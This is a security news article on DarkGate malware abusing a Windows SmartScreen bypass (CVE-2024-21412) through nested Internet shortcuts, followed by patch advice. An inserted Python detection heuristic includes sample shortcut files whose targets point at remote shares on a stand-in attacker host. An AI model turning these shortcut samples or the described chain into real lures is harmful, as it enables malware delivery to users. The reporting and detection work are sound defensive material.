A new wave of attacks by the DarkGate malware operation exploits a now-fixed Windows Defender SmartScreen vulnerability to bypass security checks and automatically install fake software installers.
SmartScreen is a Windows security feature that displays a warning when users attempt to run unrecognized or suspicious files downloaded from the internet.
The flaw, tracked as CVE-2024-21412, is a Windows Defender SmartScreen flaw that allows specially crafted downloaded files to bypass these security warnings.
Attackers can exploit the flaw by creating a Windows Internet shortcut (.url file) that points to another .url file hosted on a remote SMB share, which causes the file at the final location to be executed automatically.
Microsoft fixed the flaw in mid-February, with Trend Micro disclosing that the financially motivated Water Hydra hacking group had previously exploited it as a zero-day to drop their DarkMe malware onto traders' systems.
Today, Trend Micro analysts reported that DarkGate operators are exploiting the same flaw to improve their chances of success (infection) on targeted systems.
This is a significant development for the malware, which, along with Pikabot, has filled the void created by QBot's disruption last summer and is used by multiple cybercriminals for malware distribution.
DarkGate attack details
The attack begins with a malicious email that includes a PDF attachment with links that utilize open redirects from Google DoubleClick Digital Marketing (DDM) services to bypass email security checks.
When a victim clicks on the link, they are redirected to a compromised web server that hosts an internet shortcut file. This shortcut file (.url) links to a second shortcut file hosted on an attacker-controlled WebDAV server.
Using one Windows shortcut to open a second shortcut on a remote server effectively exploits the CVE-2024-21412 flaw, causing a malicious MSI file to execute automatically on the device.
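As an added detection example (not code from the article or from Trend Micro), the following Python heuristic parses Internet Shortcut (.url) files and flags the nested pattern described above: a shortcut whose URL= target is itself a .url file on a remote SMB (UNC) or WebDAV (file://host) location. The sample file contents, hostnames and paths are constructed placeholders.

```python
import configparser
import re
from typing import Dict, List, Optional
from urllib.parse import urlparse

# A UNC path: \\host\share\... (the article's "remote SMB share" case).
_UNC_RE = re.compile(r"^\\\\[^\\]+\\")

def shortcut_target(url_file_text: str) -> Optional[str]:
    """Return the URL= value from the [InternetShortcut] section, or None."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(url_file_text.lstrip("\ufeff"))  # tolerate a BOM
    for section in cp.sections():
        if section.lower() == "internetshortcut":
            value = cp.get(section, "url", fallback=None)
            return value.strip() if value else None
    return None

def is_nested_remote_shortcut(url_file_text: str) -> bool:
    """True when a .url file's target is another .url on a remote host.

    This is the chain described in the article: a shortcut whose URL= points
    at a second shortcut on an SMB or WebDAV share. A normal https:// target
    or a .url on the local disk is not flagged.
    """
    target = shortcut_target(url_file_text)
    if not target or not target.lower().endswith(".url"):
        return False
    if _UNC_RE.match(target):
        return True  # \\host\share\second.url
    parsed = urlparse(target)
    # file://host/share/second.url, or file://host@80/... for WebDAV
    return parsed.scheme.lower() == "file" and bool(parsed.netloc)

def scan_shortcuts(files: Dict[str, str]) -> List[str]:
    """Return the names of the shortcut files matching the nested pattern."""
    return [n for n, text in files.items() if is_nested_remote_shortcut(text)]

# Constructed sample contents; hostnames and paths are placeholders.
SAMPLES = {
    "benign.url": "[InternetShortcut]\nURL=https://example.com/docs\n",
    "local.url": "[InternetShortcut]\nURL=file:///C:/Users/Public/second.url\n",
    "unc.url": "[InternetShortcut]\nURL=\\\\attacker.example\\share\\second.url\n",
    "webdav.url": "[InternetShortcut]\nURL=file://attacker.example@80/dav/second.url\n",
}

if __name__ == "__main__":
    print(scan_shortcuts(SAMPLES))  # ['unc.url', 'webdav.url']
```

The heuristic is a triage aid for mail gateways or download folders, not a substitute for the February 2024 patch; it intentionally ignores ordinary https:// links and local .url targets to keep false positives low.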
These MSI files masqueraded as legitimate software from NVIDIA, the Apple iTunes app, or Notion.
Upon execution of the MSI installer, another DLL sideloading flaw involving the "libcef.dll" file and a loader named "sqlite3.dll" will decrypt and execute the DarkGate malware payload on the system.
Once it is initialized, the malware can steal data, fetch additional payloads and inject them into running processes, perform keylogging, and give attackers real-time remote access.
The complex and multi-step infection chain employed by DarkGate operators since mid-January 2024 is summarized in the diagram below:
Trend Micro says this campaign employs DarkGate version 6.1.7, which, compared to the older version 5, features XOR-encrypted configuration, new config options, and updates to the command and control (C2) values.
The configuration parameters available in DarkGate 6 enable its operators to determine various operational tactics and evasion techniques, such as enabling startup persistence or specifying minimum disk storage and RAM size to evade analysis environments.
The first step to mitigate the risk from these attacks would be to apply Microsoft's February 2024 Patch Tuesday update, which fixes CVE-2024-21412.
Trend Micro has published the complete list of the indicators of compromise (IoCs) for this DarkGate campaign on this webpage.